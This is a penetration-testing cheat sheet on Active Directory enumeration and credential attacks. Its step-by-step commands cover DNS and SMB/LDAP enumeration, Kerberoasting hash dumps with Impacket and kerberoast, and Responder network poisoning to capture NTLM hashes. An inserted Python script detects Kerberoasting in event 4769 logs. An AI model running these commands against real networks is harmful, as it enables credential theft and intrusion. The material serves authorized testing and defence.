Enumeration

Last updated 6 months ago

  1. Recon activity:

Enumerating DNS can reveal key servers in the domain, such as web, printer, file share, VPN and media hosts.

gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

  2. Check for null-session and Guest access on SMB services (this will not work on modern Windows versions):

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //<DC IP>

rpcclient -U "" -N <IP> #No creds

smbclient --no-pass -L //<IP> # Null user

  3. Enumerate LDAP

nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --users
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

Check whether null credentials are accepted, or whether the credentials you hold are valid:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

  4. Kerberoast

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
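A defender-side counterpart to the Kerberoast commands above, added here as an example and not part of the original cheatsheet: each service ticket request the tools above make is logged on the domain controller as Security event 4769, and the RC4 encryption type (0x17) requested for SPNs held by user accounts is what a detection keys on. The event tuples, account names and the 5-minute/3-service threshold are constructed assumptions for this example, not real logs.

```python
"""Flag likely Kerberoasting in Windows Security event 4769 records.

Heuristic: one account requesting RC4 (TicketEncryptionType 0x17) service
tickets for several distinct SPN-bearing user accounts in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of 4769 "A Kerberos service ticket was requested" events:
# (TimeCreated, TargetUserName, ServiceName, TicketEncryptionType)
SAMPLE_4769 = [
    ("2024-01-10T09:00:01", "john", "sqlsvc", "0x17"),
    ("2024-01-10T09:00:02", "john", "httpsvc", "0x17"),
    ("2024-01-10T09:00:02", "john", "backupsvc", "0x17"),
    ("2024-01-10T09:00:03", "john", "mssqlsvc", "0x17"),
    ("2024-01-10T09:00:03", "john", "krbtgt", "0x12"),   # TGT traffic, AES
    ("2024-01-10T09:05:00", "alice", "WS01$", "0x12"),   # machine account, AES
    ("2024-01-10T09:06:00", "alice", "sqlsvc", "0x12"),  # normal AES ticket
]


def is_roast_candidate(service: str, etype: str) -> bool:
    """RC4 ticket for a user-account SPN: skip krbtgt and machine accounts ($)."""
    return etype.lower() == "0x17" and service != "krbtgt" and not service.endswith("$")


def find_kerberoasting(events, window=timedelta(minutes=5), threshold=3):
    """Return {account: sorted services} for every account that requested
    `threshold` or more distinct RC4 SPN tickets within `window`."""
    by_user = defaultdict(list)
    for ts, user, service, etype in events:
        if is_roast_candidate(service, etype):
            by_user[user].append((datetime.fromisoformat(ts), service))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        # Slide a window from each request and count distinct services inside it
        for i, (start, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                hits[user] = sorted(services)
                break
    return hits


if __name__ == "__main__":
    for user, services in find_kerberoasting(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {services}")
```

Accounts that legitimately need RC4 (for example older service accounts without AES keys) will trip this rule, so tune the threshold and an allow-list against a baseline before alerting on it.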

  5. Poison the network

Running Responder

  • To run Responder with default settings: responder -I <Interface>

  • For more aggressive probing (with potential side effects): responder -I <Interface> -P -r -v

  • Techniques to capture NTLMv1 challenges/responses for easier cracking: responder -I <Interface> --lm --disable-ess

  • WPAD impersonation can be activated with: responder -I <Interface> --wpad

  • To resolve NetBIOS requests to the attacker's IP and set up an authentication proxy: responder.py -I <interface> -Pv

See also: GitHub - ropnop/go-windapsearch: Utility to enumerate users, groups and computers from a Windows domain through LDAP queries